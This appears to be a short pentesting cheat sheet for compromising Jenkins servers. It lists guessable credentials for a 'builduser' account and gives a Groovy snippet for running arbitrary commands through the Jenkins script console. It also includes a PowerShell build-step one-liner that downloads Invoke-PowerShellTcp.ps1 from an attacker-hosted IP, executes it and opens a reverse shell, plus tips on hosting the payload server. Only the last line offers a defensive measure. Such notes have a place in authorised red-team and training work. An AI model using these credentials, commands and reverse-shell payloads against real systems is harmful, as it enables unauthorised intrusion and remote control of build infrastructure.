Jenkins
If you you see a user like builduser in the user list try the following credentials
builduser: <null>
builduser:builduser
builduser:resudilub
builduser:resudilub!
With Jenkins Admin creds you can go to /script and run the following
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"No Admin creds, but can add or edit build steps in the build configuration.
Add a "Execute Windows Batch command" build step and catch a reverse shell
powershell iex (iwr -UseBasicParsing http://172.16.100.1/Invoke-PowerShellTcp.ps1);
power -Reverse -IPAddress 172.16.100.1 -Port 443Create a local firewall rule to allow the hosting of a webserver
Host the web server using HFS or python
One way to protect an enterprise application is to expose it to the internet via a Azure Proxy, make everyone authenticate using Entra ID and use a whitelist for people allowed to use it
Last updated